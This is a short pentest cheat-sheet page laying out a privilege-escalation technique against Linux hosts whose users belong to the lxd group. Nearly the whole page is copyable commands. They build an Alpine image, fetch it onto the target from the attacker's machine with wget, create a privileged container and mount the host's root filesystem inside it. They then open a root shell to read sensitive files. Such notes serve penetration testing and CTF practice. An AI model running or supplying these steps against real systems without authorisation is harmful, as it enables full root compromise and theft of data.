LXC/LXD (Linux Container/Daemon) Privilege Escalation
LXD is a container management extension for Linux Containers (LXC).
Check if You are in the Lxd Group
If you belong to the Lxd group, you may be able to the root privileges.
groups id Copied!
Check if Container Image Exists
List all images and check if a container image already exists.
lxc image list Copied!
If there are not container, build a new image in your local machine.
git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder sudo ./build-alpine python3 -m http.server 8000 Copied!
In remote machine, download the “alpine-*.tar.gz” and import it.
wget http://<local-ip>:8000/alpine-v3.17-x86_64-20221206_0615.tar.gz lxc image import ./alpine-v3.17-x86_64-20221206_0615.tar.gz --alias testimage lxc image list Copied!
After that, create a new container from the image.
lxc init testimage testcontainer -c security.privileged=true Copied!
If you got the error “No storage pool found. Please create a new storage pool.”, initialize the lxd at first.
lxd init # Set default values in prompt Copied!
Then create a new container as above command.
Mount the New Container to Root Directory
Now mount the host's / directory onto /mnt/root in the container you created.
lxc config device add testcontainer testdevice disk source=/ path=/mnt/root recursive=true Copied!
Start the Container
lxc start testcontainer Copied!
Get a Shell
lxc exec testcontainer /bin/sh Copied!
Check if you are root.
whoami Copied!
Retrieve the Sensitive Information in the Mounted Directory
cd /mnt/root/
Last updated